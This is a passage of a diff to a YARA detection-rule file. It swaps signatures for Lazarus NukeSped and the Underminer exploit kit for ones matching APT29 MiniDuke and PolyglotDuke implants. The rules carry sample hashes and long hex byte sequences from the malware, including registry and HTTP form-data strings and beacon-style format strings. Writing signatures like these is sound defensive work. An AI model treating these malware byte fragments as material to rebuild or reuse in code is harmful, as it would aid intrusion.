2f 8f 4d 01 e8 09 d0 01 c0 b8 4e 35 2f 2a 58 52 ba 6d 65 6b 13 01 fa 09 da 31 c2 09 da ba c9 1d 51 12 31 c2 5a 8d 4d 9c c7 45 9c 48 74 74 70 51 8d 45 aa c7 45 a0 51 75 65 72 50 51 8d 8d 48 fc ff ff c7 45 a4 79 49 6e 66 66 c7 45 a8 6f 57 e8 de 77 f2 ff c6 45 fc 3c 83 78 14 10 72 02 8b 00 50 8d 8d 50 fd ff ff e8 26 77 f2 ff c6 45 fc 3d 8d 85 50 fd ff ff 50 8d 85 98 fb ff ff 8b cb 50 e8 4d 77 00 00 8b f0 c6 45 fc 3e 8d 9f 18 01 00 00 3b de 74 24 8b 4b 10 85 c9 74 15 8b 11 3b cb 0f 95 c0 0f b6 c0 50 ff 52 10 c7 43 10 00 00 00 00 56 8b cb e8 d9 2a f6 ff c6 45 fc 3d 8d 8d 98 fb ff ff e8 ba 7a f2 ff c6 45 fc 3c 83 bd 64 fd ff ff 10 72 0e ff b5 50 fd ff ff e8 87 09 17 00 83 c4 04 c7 85 64 fd ff ff 0f 00 00 00 c7 85 60 fd ff ff 00 00 00 00 c6 85 50 fd ff ff 00 c6 45 fc 1b 83 bd 5c fc ff ff 10 72 0e ff b5 48 fc ff ff e8 51 09 17 00 83 c4 04 c7 85 5c fc ff ff 0f 00 00 00 c7 85 58 fc ff ff 00 00 00 00 c6 85 48 fc ff ff 00 56 01 d6 19 ee be ed 3e 23 0c 01 fe 21 e6 be db 1f 20 70 31 e6 5e 57 29 c7 bf 8d 30 ff 05 bf 4e 30 f9 71 19 f7 29 f7 31 ff 09 ef 5f 68 b8 b3 2b 10 8d 8d d8 fc ff ff e8 22 76 f2 ff c6 45 fc 3f 8d 8d d8 fc ff ff e8 f3 e5 f3 ff 8b f0 c6 45 fc 1b 83 bd ec fc ff ff 10 72 0e ff b5 d8 fc ff ff e8 ce 08 17 00 83 c4 04 c7 85 ec fc ff ff 0f 00 00 00 c7 85 e8 fc ff ff 00 00 00 00 c6 85 d8 fc ff ff 00 52 ba 13 63 67 6d ba 64 19 d5 47 ba 08 52 da 36 01 ea 29 f2 90 5a 55 bd 53 0d b6 39 bd 54 64 02 7d bd 29 00 37 0f 09 d5 31 c5 90 5d 8d 45 c0 8b ce 50 e8 f4 f0 f4 ff c6 45 fc 40 52 29 c2 ba a5 19 33 0c 19 ea 31 e2 01 c2 ba 3c 66 39 43 29 ca 5a 52 ba f7 42 4e 7a 09 d2 19 c2 19 e2 01 e2 21 ca 01 ca 01 da 90 5a 8d 45 d8 8b ce 50 e8 c9 fa f4 ff c6 45 fc 41 57 01 df 09 d7 bf 16 71 1b 6c bf 80 30 fd 65 01 ff 19 f7 21 ef 5f 50 29 e8 b8 6d 44 90 22 01 e8 21 c8 b8 17 5e 05 78 09 f0 01 e8 58 83 7d d0 00 76 5b 83 7d d4 08 8b 45 c0 73 03 8d 45 c0 83 7d ec 08 8b 4d d8 73 03 8d 4d d8 83 ec 08 50 6a 03 51 8d 4f 40 e8 3c 87 ff ff 89 87 a0 04 00 00 52 31 e2 01 e2 ba b7 14 98 25 01 ca ba 2f 1e d7 1b 19 f2 29 d2 5a 57 bf 75 4c a1 10 bf dc 04 47 09 01 d7 bf 9e 5f 9a 0e 01 e7 90 5f eb 4e 83 7d ec 08 8b 45 d8 73 03 8d 45 d8 83 ec 08 8d 4f 40 6a 00 6a 01 50 e8 ec 86 ff ff 89 87 a0 04 00 00 53 bb ea 4a 79 17 21 eb 31 db bb b9 2c e1 4c 09 d3 21 eb 19 c3 5b 51 b9 91 6c 71 6d b9 64 25 d3 02 19 c1 19 c1 31 e1 29 f1 29 d9 59 83 bf a0 04 00 00 00 0f 85 a6 00 00 00 8d 8d e4 fe ff ff c7 85 e4 fe ff ff 43 61 6e 6e 51 8d 85 00 ff ff ff c7 85 e8 fe ff ff 6f 74 20 70 50 51 8d 8d 68 fb ff ff c7 85 ec fe ff ff 65 72 66 6f c7 85 f0 fe ff ff 72 6d 20 49 c7 85 f4 fe ff ff 6e 74 65 72 c7 85 f8 fe ff ff 6e 65 74 4f c7 85 fc fe ff ff 70 65 6e 21 e8 bd 74 f2 ff c6 45 fc 42 83 78 14 10 }
+		$seq2 = { 59 52 29 d2 ba 02 4d d2 52 ba 5f 54 50 4f 29 ea 29 c2 01 ea 01 e2 5a 56 21 ee 01 ee be 38 36 21 60 31 f6 19 ce 29 d6 be 13 6c 2d 6f 5e 85 c0 0f 85 0a 02 00 00 8d 8d 1c fe ff ff c7 85 1c fe ff ff 43 61 6e 6e 51 8d 85 5e fe ff ff c7 85 20 fe ff ff 6f 74 20 69 50 51 8d 8d c4 f7 ff ff c7 85 24 fe ff ff 6e 69 74 69 c7 85 28 fe ff ff 61 6c 69 7a c7 85 2c fe ff ff 65 20 73 69 c7 85 30 fe ff ff 67 6e 65 72 c7 85 34 fe ff ff 21 20 43 61 c7 85 38 fe ff ff 6e 6e 6f 74 c7 85 3c fe ff ff 20 70 65 72 c7 85 40 fe ff ff 66 6f 72 6d c7 85 44 fe ff ff 20 43 72 79 c7 85 48 fe ff ff 70 74 41 63 c7 85 4c fe ff ff 71 75 69 72 c7 85 50 fe ff ff 65 43 6f 6e c7 85 54 fe ff ff 74 65 78 74 c7 85 58 fe ff ff 20 65 72 72 66 c7 85 5c fe ff ff 6f 72 e8 93 5b f1 ff c6 45 fc 46 83 78 14 10 72 02 8b 00 50 8d 8d f0 f9 ff ff e8 db 5a f1 ff c6 45 fc 47 ff d3 50 8d 85 f0 f9 ff ff 50 8d 8d 78 f8 ff ff e8 c2 e3 f8 ff 68 d4 4f 2e 10 8d 85 78 f8 ff ff 50 e8 3c 31 16 00 8d 8d 64 fe ff ff c7 85 64 fe ff ff 43 61 6e 6e 51 8d 85 a6 fe ff ff c7 85 68 fe ff ff 6f 74 20 69 50 51 8d 8d 94 f7 ff ff c7 85 6c fe ff ff 6e 69 74 69 c7 85 70 fe ff ff 61 6c 69 7a c7 85 74 fe ff ff 65 20 73 69 c7 85 78 fe ff ff 67 6e 65 72 c7 85 7c fe ff ff 21 20 43 61 c7 85 80 fe ff ff 6e 6e 6f 74 c7 85 84 fe ff ff 20 70 65 72 c7 85 88 fe ff ff 66 6f 72 6d c7 85 8c fe ff ff 20 43 72 79 c7 85 90 fe ff ff 70 74 41 63 c7 85 94 fe ff ff 71 75 69 72 c7 85 98 fe ff ff 65 43 6f 6e c7 85 9c fe ff ff 74 65 78 74 c7 85 a0 fe ff ff 20 65 72 72 66 c7 85 a4 fe ff ff 6f 72 e8 8e 5a f1 ff c6 45 fc 48 83 78 14 10 72 02 8b 00 }
+		$seq3 = { c7 85 1c f8 ff ff 07 00 00 00 c7 85 18 f8 ff ff 00 00 00 00 33 c0 66 89 85 08 f8 ff ff 53 19 f3 21 db 21 fb 31 f3 29 fb 19 f3 bb 9f 7a e7 00 21 fb 90 5b 52 ba 77 2c 66 51 ba 60 54 5a 36 19 ea 09 ca ba 32 36 94 1b 90 5a 53 09 eb bb 92 73 c4 2a bb d1 71 ed 5e 01 eb bb 9b 43 21 23 90 5b 50 b8 09 65 36 3a 09 c0 29 e8 29 f8 21 f8 b8 3d 39 c6 44 01 e8 58 89 85 78 fd ff ff 89 85 7c fd ff ff 89 85 80 fd ff ff 89 85 84 fd ff ff 89 85 88 fd ff ff 89 85 8c fd ff ff c7 85 88 f8 ff ff 52 65 67 4f c7 85 8c f8 ff ff 70 65 6e 4b c7 85 90 f8 ff ff 65 79 45 78 c6 85 94 f8 ff ff 57 89 85 48 f8 ff ff 89 85 4c f8 ff ff c7 85 4c f8 ff ff 0f 00 00 00 89 85 48 f8 ff ff 88 85 38 f8 ff ff 8d 85 95 f8 ff ff 50 8d 85 88 f8 ff ff 50 8d 85 38 f8 ff ff 50 50 8b c8 e8 99 c1 de ff c6 45 fc 0a 83 bd 4c f8 ff ff 10 8b 85 38 f8 ff ff 73 06 8d 85 38 f8 ff ff 50 8d }
+		$seq4 = { 31 e1 b9 e9 52 83 05 29 d1 01 f9 59 80 7d 0c 00 0f 84 fb 03 00 00 66 c7 85 70 fe ff ff 0d 0a c7 85 50 fe ff ff 0d 0a 2d 2d c7 85 14 fe ff ff 53 75 62 6d c7 85 18 fe ff ff 69 74 74 65 c6 85 1c fe ff ff 64 c7 85 78 fd ff ff 43 6f 6e 74 c7 85 7c fd ff ff 65 6e 74 2d c7 85 80 fd ff ff 44 69 73 70 c7 85 84 fd ff ff 6f 73 69 74 c7 85 88 fd ff ff 69 6f 6e 3a c7 85 8c fd ff ff 20 66 6f 72 c7 85 90 fd ff ff 6d 2d 64 61 c7 85 94 fd ff ff 74 61 3b 20 c7 85 98 fd ff ff 6e 61 6d 65 c7 85 9c fd ff ff 3d 22 65 6e c7 85 a0 fd ff ff 64 22 0d 0a 66 c7 85 a4 fd ff ff 0d 0a 8d 8d 70 fe ff ff 8d 85 72 fe ff ff 51 50 51 8d 8d 3c fa ff ff e8 b3 34 fb ff 8b d8 c6 45 fc 35 8d 8d 50 fe ff ff 8d 85 54 fe ff ff 51 50 51 8d 8d 6c fa ff ff e8 93 34 fb ff 8b f8 c6 45 fc 36 8d 8d 14 fe ff ff 8d 85 1d fe ff ff 51 50 51 8d 8d 84 fa ff ff e8 73 34 fb ff c6 45 fc 37 83 78 14 10 72 02 8b 00 50 8d 8d 1c f8 ff ff e8 bb 33 fb ff 89 85 7c fe ff ff c6 45 fc 38 8d 8d 78 fd ff ff 8d 85 a6 fd ff ff 51 50 51 8d 8d 80 f8 ff ff e8 37 34 fb ff c6 45 fc 39 83 78 14 10 72 02 8b 00 ff b5 7c fe ff ff 8b d0 8d 8d 04 f7 ff ff e8 88 4e fc ff 83 c4 04 c6 45 fc 3a 83 7f 14 10 72 02 8b 3f 57 8b d0 8d 8d 9c f8 ff ff e8 cb 60 fb ff c6 45 fc 3b 8d 4d d4 51 8b d0 8d 8d 74 f7 ff ff e8 96 b9 00 00 83 c4 08 c6 45 fc 3c 83 7b 14 10 72 02 8b 1b 53 8b d0 8d 8d b8 f8 ff ff e8 99 60 fb ff 83 c4 04 c6 45 fc 3d 6a ff 6a 00 50 8d 4d a4 e8 d5 39 fb ff c6 45 fc 3c 83 bd cc f8 ff ff 10 72 0e ff b5 b8 f8 ff ff e8 d2 c5 1f 00 83 c4 04 c7 85 cc f8 ff ff 0f 00 00 00 c7 85 c8 f8 ff ff 00 00 00 00 c6 85 b8 f8 ff ff 00 c6 45 fc 3b 83 bd 88 f7 ff ff 10 72 0e ff b5 74 f7 ff ff e8 9c c5 1f 00 83 c4 04 c7 85 88 f7 ff ff 0f 00 00 00 c7 85 84 f7 ff ff 00 00 00 00 c6 85 74 f7 ff ff 00 c6 45 fc 3a 83 bd b0 f8 ff ff 10 72 0e ff b5 9c f8 ff ff e8 66 c5 1f 00 83 c4 04 c7 85 b0 f8 ff ff 0f 00 00 00 c7 85 ac f8 ff ff 00 00 00 00 c6 85 9c f8 ff ff 00 c6 45 fc 39 83 bd 18 f7 ff ff 10 72 0e ff b5 04 f7 ff ff e8 30 c5 1f 00 83 c4 04 c7 85 18 f7 ff ff 0f 00 00 00 c7 85 14 f7 ff ff 00 00 00 00 c6 85 04 f7 ff ff 00 c6 45 fc 38 83 bd 94 f8 ff ff 10 72 0e ff b5 80 f8 ff ff e8 fa c4 1f 00 83 c4 04 c7 85 94 f8 ff ff 0f 00 00 00 c7 85 90 f8 ff ff 00 00 00 00 c6 85 80 f8 ff ff 00 c6 45 fc 37 83 bd 30 f8 ff ff 10 72 0e ff b5 1c f8 ff ff e8 c4 c4 1f 00 83 c4 04 c7 85 30 f8 ff ff 0f 00 00 00 c7 85 2c f8 ff ff 00 00 00 00 c6 85 1c f8 ff ff 00 c6 45 fc 36 83 bd 98 fa ff ff 10 72 0e ff b5 84 fa ff ff e8 8e c4 1f 00 83 c4 04 c7 85 98 fa ff ff 0f 00 00 00 c7 85 94 fa ff ff 00 00 00 00 c6 85 84 fa ff ff 00 c6 45 fc 35 83 bd 80 fa ff ff 10 72 0e ff b5 6c fa ff ff e8 58 c4 1f 00 83 c4 04 c7 85 80 fa ff ff 0f 00 00 00 c7 85 7c fa ff ff 00 00 00 00 c6 85 6c fa ff ff 00 c6 45 fc 27 83 bd 50 fa ff ff 10 72 0e ff b5 3c fa ff ff e8 22 c4 1f 00 83 c4 04 c7 85 50 fa ff ff 0f 00 00 00 c7 85 4c fa ff ff 00 00 00 00 c6 85 3c fa ff ff 00 53 19 d3 bb 18 4a 91 1c 21 c3 bb 82 54 5d 2c bb b0 08 2a 58 90 5b 51 21 e9 b9 b9 6e b4 14 31 f1 01 c1 01 f9 19 e1 21 d9 09 f9 90 59 56 be cd 3a 33 5a be 85 1b aa 6f be 1e 6c 78 2d 19 d6 21 e6 90 5e 53 31 f3 bb 8c 21 88 0d 31 db 31 eb 19 d3 19 f3 31 f3 01 f3 90 5b 80 7e 40 00 0f 85 03 06 00 00 66 c7 85 60 fe ff ff 0d 0a c7 85 48 fe ff ff 0d 0a 2d 2d c7 85 d8 fc ff ff 43 6f 6e 74 c7 85 dc fc ff ff 65 6e 74 2d c7 85 e0 fc ff ff 44 69 73 70 c7 85 e4 fc ff ff 6f 73 69 74 c7 85 e8 fc ff ff 69 6f 6e 3a c7 85 ec fc ff ff 20 66 6f 72 c7 85 f0 fc ff ff 6d 2d 64 61 c7 85 f4 fc ff ff 74 61 3b 20 c7 85 f8 fc ff ff 6e 61 6d 65 c7 85 fc fc ff ff 3d 22 63 73 c7 85 00 fd ff ff 72 66 5f 74 c7 85 04 fd ff ff 6f 6b 65 6e c7 85 08 fd ff ff 22 0d 0a 0d c6 85 0c fd ff ff 0a 8d 8d 60 fe ff ff 8d 85 62 fe ff ff 51 50 51 8d 8d 00 f9 ff ff e8 b7 30 fb ff 8b d8 c6 45 fc 3e 8d 8d 48 fe ff ff 8d 85 4c fe ff ff 51 50 51 8d 8d 30 f9 ff ff e8 97 30 }
+		$op1 = { 37 25 38 3d 38 43 38 5e 38 6c 38 77 38 }
+		$op2 = { 3f 25 3f 36 3f 66 3f 74 3f }
+		$op3 = { 68 66 43 78 28 6a 25 }
+		$op4 = { 61 46 25 7c 5f 56 21 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 300KB and 4 of ( $seq* )
+		uint16( 0 ) == 0x5a4d and filesize > 350KB and 2 of ( $seq* ) and 3 of ( $op* )
 }
-rule ARKBIRD_SOLG_APT_Lazarus_Jun_2021_1 : FILE
+rule ARKBIRD_SOLG_APT_APT29_Miniduke_Mar_2021_1 : FILE
 {
 	meta:
-		description = "Detect a variant of NukeSped malware"
+		description = "Detect MiniDuke implant used by APT29 group"
 		author = "Arkbird_SOLG"
-		id = "0f5d42c0-d6dc-573b-9227-787ccbcaa83d"
-		date = "2021-06-19"
-		modified = "2021-06-21"
+		id = "2faefc2f-afe3-51df-b530-50d3b3775071"
+		date = "2021-03-08"
+		modified = "2021-03-10"
 		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-19/Lazarus/APT_Lazarus_Jun_2021_1.yara#L1-L20"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-09/APT29/APT_APT29_MiniDuke_Mar_2021_1.yar#L1-L20"
 		license_url = "N/A"
-		logic_hash = "ea4ce93d54b9b8e5d1d5bb64d37ac26839e2fa3200da3057597d83c4be6d129f"
-		score = 75
+		logic_hash = "2fcbe37f9ee26a246bfc397cc907bb570a01d0f5b8e323a81aae0f6426b60435"
+		score = 50
 		quality = 75
 		tags = "FILE"
-		hash1 = "5c2f339362d0cd8e5a8e3105c9c56971087bea2701ea3b7324771b0ea2c26c6c"
-		hash2 = "2dff6d721af21db7d37fc1bd8b673ec07b7114737f4df2fa8b2ecfffbe608a00"
-		hash3 = "1177105e51fa02f9977bd435f9066123ace32b991ed54912ece8f3d4fbeeade4"
-		tlp = "White"
-		adversary = "Lazarus"
+		hash1 = "6057b19975818ff4487ee62d5341834c53ab80a507949a52422ab37c7c46b7a1"
+		level = "Experimental"
 
 	strings:
-		$seq1 = { 48 8b ce e8 8a 2c 00 00 48 8b d8 48 85 c0 0f 84 28 06 00 00 4c 8b c6 33 d2 48 8b c8 e8 11 56 00 00 8d 4e fc 48 8d 57 04 4c 63 c1 48 8b cb e8 af 3a 00 00 33 c0 48 8d 4c 24 30 48 89 4c 24 28 45 33 c9 4c 8b c3 33 d2 33 c9 89 44 24 30 89 44 24 20 ff 15 4b 49 01 00 48 85 c0 0f 84 d4 05 00 00 ba 88 13 00 00 48 8b c8 ff 15 9c 2c 02 00 48 8d 8d 91 00 00 00 33 d2 41 b8 ff 03 00 00 c6 85 90 00 00 00 00 e8 a9 55 00 00 48 8d 15 02 c1 01 00 48 8d 8d 90 00 00 00 e8 16 2b 00 00 48 8d 85 90 00 00 00 48 83 cb ff 48 ff c3 80 3c 18 00 75 f7 41 b2 84 ba 43 90 21 57 41 b8 c2 a2 a9 09 85 db 0f 8e 4b 05 00 00 4c 8d 8d 90 00 00 00 44 8b db 66 90 41 0f b6 01 41 0f b6 c8 4d 8d 49 01 32 ca 41 32 c2 44 22 d1 41 32 c0 42 8d 0c c5 00 00 00 00 32 c2 41 33 c8 41 88 41 ff 81 e1 f8 07 00 00 41 0f b6 c0 22 c2 c1 e1 14 44 32 d0 41 8b c0 44 8b c1 c1 e8 08 8d 0c 12 33 ca 44 0b c0 8b c2 c1 e1 04 c1 e0 07 33 ca 83 e1 80 33 c8 8b c2 c1 e1 11 c1 e8 08 8b d1 0b d0 49 ff }
-		$seq2 = { 48 8d ac 24 50 ff ff ff 48 81 ec b0 01 00 00 48 8b 05 82 09 02 00 48 33 c4 48 89 85 a0 00 00 00 44 8b 25 d5 38 02 00 4c 8b f9 48 8d 4d 91 33 d2 41 b8 03 01 00 00 c6 45 90 00 e8 59 66 00 00 b9 3c 00 00 00 ff 15 f6 3c 02 00 ff 15 88 59 01 00 8b c8 e8 51 42 00 00 e8 20 42 00 00 b9 3c 00 00 00 8b d8 83 e3 03 83 c3 08 ff 15 d1 3c 02 00 ff 15 63 59 01 00 8b c8 e8 2c 42 00 00 e8 fb 41 00 00 b9 3c 00 00 00 8b f8 83 e7 01 83 c7 05 ff 15 ac 3c 02 00 ff 15 3e 59 01 00 8b c8 e8 07 42 00 00 e8 d6 41 00 00 8b f0 b8 ab aa aa aa f7 e6 d1 ea 8d 0c 52 2b f1 83 eb 08 0f 84 30 03 00 00 ff cb 0f 84 68 02 00 00 ff cb 0f 84 9a 01 00 00 ff cb 0f 85 ef 04 00 00 8d 4b 3c ff 15 60 3c 02 00 ff 15 f2 58 01 00 8b c8 e8 bb 41 00 00 e8 8a 41 00 00 8b d8 b8 1f 85 eb 51 f7 e3 c1 ea 03 6b ca 19 2b d9 b9 3c 00 00 00 83 c3 0a ff 15 2f 3c 02 00 ff 15 c1 58 01 00 8b c8 e8 8a 41 00 00 e8 59 41 00 00 44 8b f0 b8 ab aa aa aa 41 f7 e6 c1 ea 02 8d 0c 52 03 c9 44 2b f1 b9 3c 00 00 00 41 81 c6 d7 07 00 00 ff 15 f5 3b 02 00 ff 15 87 58 01 00 8b c8 e8 50 41 00 00 e8 1f 41 00 00 44 8b e8 b8 ab aa aa aa 41 f7 e5 c1 ea 03 8d 0c 52 c1 e1 02 44 2b e9 b9 3c 00 00 00 41 ff c5 ff 15 be 3b 02 00 ff 15 50 58 01 00 8b c8 e8 19 41 00 00 e8 e8 40 00 00 44 8b c0 b8 09 cb 3d 8d 41 f7 e0 c1 ea 04 6b ca 1d 44 2b c1 b9 7d 00 00 00 41 ff c0 44 89 44 24 74 e8 3e 3b 00 00 33 d2 44 8d 42 7d 48 8b c8 e8 d0 64 00 00 4c 8d 44 24 70 48 8d 0d d4 ce 01 00 ba 7c 00 00 00 c7 44 24 70 00 00 00 00 e8 c2 27 00 00 44 8b 44 24 70 48 8b d0 48 8b c8 48 89 44 24 78 e8 3d 25 00 00 48 8b 44 24 78 4c 8d 45 90 48 8b d0 4c 2b c0 0f 1f 40 00 66 66 0f 1f 84 00 00 00 00 00 0f b6 0a 48 8d 52 01 41 88 4c 10 ff 84 c9 75 f0 48 8b c8 e8 88 3a 00 00 8b 44 24 74 44 89 64 24 48 89 5c 24 40 89 44 24 38 44 89 6c 24 30 48 8d 55 90 44 8b cf 41 b8 04 00 00 00 49 8b cf 44 89 74 24 28 89 74 24 20 e8 b4 39 00 00 e9 5d 03 00 00 b9 3c 00 00 00 ff 15 cc 3a 02 00 ff 15 5e 57 01 00 8b c8 e8 27 40 00 00 e8 f6 3f 00 00 b9 79 00 00 00 8b d8 83 e3 03 e8 63 3a 00 00 33 d2 44 8d 42 79 48 8b c8 e8 f5 63 00 00 4c 8d 44 24 70 48 8d 0d 79 cd 01 00 ba 78 00 00 00 c7 44 24 70 00 00 00 00 e8 e7 26 00 00 44 8b 44 24 70 48 8b d0 48 8b c8 4c 8b f0 e8 64 24 00 00 4c 8d 45 90 49 8b d6 4d 2b c6 66 66 0f 1f 84 00 00 00 00 00 0f b6 0a 48 8d 52 01 41 88 4c 10 ff 84 c9 75 f0 49 8b ce e8 b8 39 00 00 44 89 64 24 38 8d 43 04 89 44 24 30 44 8d 4b 08 48 8d 55 90 41 b8 04 00 00 00 49 8b cf 89 74 24 28 89 }
-		$seq3 = { 48 89 5c 24 18 55 56 57 48 83 ec 70 48 8b 05 9d fe 01 00 48 33 c4 48 89 44 24 60 33 c0 48 8b d9 8b fa 8d 48 20 c6 44 24 48 00 48 89 44 24 49 48 89 44 24 51 e8 d7 31 00 00 48 8d 15 44 c6 01 00 48 8b f0 33 c0 48 8d 4c 24 48 48 89 06 48 89 46 08 48 89 46 10 4c 8b c3 48 89 46 18 e8 3f 13 00 00 48 8d 4c 24 48 ff 15 ac 50 01 00 bd 02 00 00 00 0f b7 cf 89 44 24 3c 66 89 6c 24 38 ff 15 a5 2e 02 00 8d 55 ff 44 8d 45 04 8b cd 66 89 44 24 3a ff 15 01 32 02 00 48 8b f8 48 83 f8 ff 75 20 48 8d 15 e1 c5 01 00 48 8b ce e8 81 30 00 00 48 0b df 48 ff c3 80 3c 1e 00 75 f7 e9 c9 00 00 00 48 8d 54 24 38 41 b8 10 00 00 00 48 8b c8 ff 15 f4 31 02 00 83 f8 ff 75 6b 48 8d 15 a8 c5 01 00 48 8b ce e8 48 30 00 00 48 83 cb }
-		$seq4 = { 40 55 48 8d ac 24 e0 fb ff ff 48 81 ec 20 05 00 00 48 8b 05 b8 fc 01 00 48 33 c4 48 89 85 10 04 00 00 48 8d 8d f1 00 00 00 33 d2 41 b8 03 01 00 00 c6 85 f0 00 00 00 00 e8 93 59 00 00 48 8d 8d 01 02 00 00 33 d2 41 b8 07 02 00 00 c6 85 00 02 00 00 00 e8 78 59 00 00 48 8d 4d e1 33 d2 41 b8 03 01 00 00 c6 45 e0 00 e8 63 59 00 00 48 8d 95 f0 00 00 00 41 b8 f4 01 00 00 33 c9 ff 15 2e 30 02 00 85 c0 0f 84 5e 01 00 00 48 8d 55 e0 b9 f4 01 00 00 48 89 9c 24 30 05 00 00 48 89 bc 24 38 05 00 00 ff 15 17 30 02 00 4c 8d 05 20 15 02 00 48 8d 4d e0 ba 04 01 00 00 e8 5a 37 00 00 48 8d 45 e0 4c 8d 0d f7 14 02 00 48 89 44 24 28 48 8d 85 f0 00 00 00 4c 8d 85 f0 00 00 00 48 8d 15 dd c3 01 00 48 8d 8d 00 02 00 00 48 89 44 24 20 e8 fc 10 00 00 33 ff 48 8d 4d e0 48 89 7c 24 30 44 8d 47 03 45 33 c9 ba 00 00 00 40 c7 44 24 28 80 00 00 00 c7 44 24 20 02 00 00 00 ff 15 6f 2f 02 00 48 8b d8 }
-		$seq5 = { 48 89 5c 24 10 48 89 74 24 18 48 89 7c 24 20 55 48 8d ac 24 70 f2 ff ff 48 81 ec 90 0e 00 00 48 8b 05 da ed 01 00 48 33 c4 48 89 85 80 0d 00 00 48 8b f1 48 8d 8d 81 05 00 00 33 d2 41 b8 ff 07 00 00 c6 85 80 05 00 00 00 e8 b2 4a 00 00 48 8d 4d 71 33 d2 41 b8 03 01 00 00 c6 45 70 00 e8 9d 4a 00 00 33 c0 c6 44 24 50 00 39 05 f4 1c 02 00 89 44 24 51 75 0b e8 b5 dd ff ff 89 05 e3 1c 02 00 48 8d 4d 70 e8 c6 e3 ff ff 8b 05 e8 b5 01 00 48 8d 8d 81 01 00 00 89 44 24 50 0f b6 05 da b5 01 00 33 d2 41 b8 ff 03 00 00 c6 85 80 01 00 00 00 88 44 24 54 e8 46 4a 00 00 48 8d 15 3f b6 01 00 48 8d 8d 80 01 00 00 e8 b3 1f 00 00 48 8d 4d 90 33 d2 0f 10 05 b6 b6 01 00 0f 10 0d bf b6 01 00 41 b8 d4 00 00 00 0f 29 44 24 60 0f 29 4c 24 70 0f 10 05 b8 b6 01 00 0f 29 45 80 e8 ff 49 00 00 48 83 cb ff 48 8b c3 0f 1f 84 }
+		$s1 = { 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 6d 75 6c 74 69 70 61 72 74 2f 66 6f 72 6d 2d 64 61 74 61 3b 20 62 6f 75 6e 64 61 72 79 3d 00 00 00 00 2d 2d 25 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 25 73 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 25 73 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 25 73 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 25 73 }
+		$s2 = { 70 72 6f 63 3a 20 20 25 64 20 25 73 0a 6c 6f 67 69 6e 3a 20 25 73 5c 25 73 0a 49 44 3a 20 20 20 20 30 78 25 30 38 58 0a 68 6f 73 74 3a 20 20 25 73 3a 25 64 0a 6d 65 74 68 3a 20 20 25 73 20 25 64 0a 70 69 70 65 3a 20 5c 5c 25 73 5c 70 69 70 65 5c 25 73 0a 6c 61 6e 67 3a 20 20 25 73 0a 64 65 6c 61 79 3a 20 25 64 }
+		$s3 = { 75 70 74 69 6d 65 20 25 35 64 2e 25 30 32 64 68 0a 00 25 73 3a 25 64 00 25 73 5c 25 73 00 3f 00 25 64 20 25 73 0a 25 73 20 25 73 20 25 73 }
+		$s4 = { 55 89 e5 83 ec 14 6a 02 ff 15 b8 53 44 00 e8 fd fe ff ff 8d b6 00 00 00 00 8d bc 27 00 00 00 00 55 89 e5 83 ec 14 6a 01 ff 15 }
+		$s5 = { 8b 85 54 64 ff ff 8b 95 44 64 ff ff 83 c2 44 89 44 24 04 89 14 24 e8 a4 e5 fc ff 83 ec 08 8b 85 44 64 ff ff 83 c0 38 c7 44 24 08 0c 00 00 00 c7 44 24 04 00 00 00 00 89 04 24 e8 8c e8 fd ff 8b 85 44 64 ff ff c7 40 38 0c 00 00 00 8b 85 44 64 ff ff c7 40 40 01 00 00 00 8b 85 44 64 ff ff c7 40 3c 00 00 00 00 8b 85 44 64 ff ff 8d 58 38 8b 85 44 64 ff ff 8d 50 1c 8b 85 44 64 ff ff 83 c0 18 c7 44 24 0c 00 40 00 00 89 5c 24 08 89 54 24 04 89 04 24 e8 2e e5 fc ff 83 ec 10 85 c0 0f 95 c0 84 c0 0f 84 09 05 00 00 8b 85 44 64 ff ff 8d 58 38 8b 85 44 64 ff ff 8d 50 24 8b 85 44 64 ff ff 83 c0 20 c7 44 24 0c 00 40 00 00 89 5c 24 08 89 54 24 04 89 04 24 e8 eb e4 fc ff 83 ec 10 85 c0 0f 95 c0 84 c0 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 60KB and 4 of ( $seq* )
+		uint16( 0 ) == 0x5a4d and filesize > 150KB and 3 of them
 }
-rule ARKBIRD_SOLG_Exp_Underminer_Apr_2021_1 : FILE
+rule ARKBIRD_SOLG_APT_APT29_Polyglotduke_Mar_2021_1 : FILE
 {
 	meta:
-		description = "Detect Underminer exploit kit"
+		description = "Detect PolyglotDuke implant used by APT29 group"
 		author = "Arkbird_SOLG"
-		id = "bd2a6b30-e05a-5f90-8dc2-719c1ba48a61"
-		date = "2021-04-14"
-		modified = "2021-04-15"
-		reference = "https://twitter.com/nao_sec/status/1382358986813415427"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-04-14/Underminer/Exp_Underminer_Apr_2021_1.yar#L1-L20"
+		id = "751e4f57-2c31-5cad-a794-e124b40c537b"
+		date = "2021-03-08"
+		modified = "2021-03-10"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-09/APT29/APT_APT29_PolyglotDuke_Mar_2021_1.yar#L1-L19"
 		license_url = "N/A"
-		logic_hash = "46dd4d8ba58e79761056d3dd6921530520b0071090bcfc3bfaed7a6804f787b7"
+		logic_hash = "3a6d54fb266fe054886569c200f122b1e4459e0d561fe5246b623a19ec526224"
 		score = 75
-		quality = 63
+		quality = 75
 		tags = "FILE"
-		hash1 = "172ac73cda6260918510ad2f4481a7fcd90c5a86d47dd880c5bcb3596dd20a7d"
+		hash1 = "9b33ec7f5e615a6556f147b611425d3ca4a8879ce746d4a8cb62adf4c7f76029"
+		hash2 = "0c39fce5bd32b4f91a1df4f6321c2f01c017195659c7e95a235ef71ca2865aa9"
 
